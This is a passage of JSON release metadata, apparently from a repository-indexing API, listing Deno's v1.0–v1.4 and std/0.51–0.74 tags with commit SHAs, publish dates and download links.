10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg